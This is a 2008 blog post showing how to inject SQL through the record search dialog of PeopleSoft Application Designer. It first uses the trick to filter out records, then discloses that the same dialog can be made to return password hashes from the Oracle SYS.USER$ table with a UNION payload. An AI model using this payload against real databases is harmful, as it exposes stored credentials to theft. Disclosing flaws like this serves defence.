SQL Injection – Definition:

SQL injection is a technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed.

It is in fact an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another.

Scenario:

I was performing ALTER AUDIT for a training PeopleSoft environment and the audit process used to terminate while processing a set of custom history records that all started with HEX% (example– PS_HEX_H_JOB, PS_HEX_H_PERS_NID, etc).

Goal:

I wanted to insert all the records into the project skipping records that start with HEX.

Steps:

PeopleSoft application designer does not provide the option of skipping records that you need to insert into the project.

If I do not select any record name and press enter then it will list all the records (see below).

sql-injection-1

I have the option of selecting certain records using the “%” option as shown below.

sql-injection-2

However, there is no option to select all but skip some of the records.

Trick

You can trick the Application Designer by constructing the below statement in the dialog box.

sql-injection-3

The statement is shown below.

%’ AND RECNAME NOT LIKE ‘HEX%

We have tricked the App Designer to execute the below SQL for us.

SELECT RECNAME FROM PSRECDEFN WHERE RECNAME LIKE ‘%’ AND RECNAME NOT LIKE ‘HEX% AND RECTYPE=0 ORDER BY 1

Notes:

Similarly you can modify the SQL to use other valid combinations to meet your requirements.

Vulnerability:

The below SQL will provide us list of all the passwords from SYS.USER$.

%’ UNION SELECT PASSWORD FROM SYS.USER$ WHERE ‘1%’=’1

sql-injection-4

Posted by Nitin Pai
Comments (1)
March 28th, 2008

Comments (1)

ILikePi - May 27th, 2008

Wow, that's really disturbing. Good find.

Comments are closed.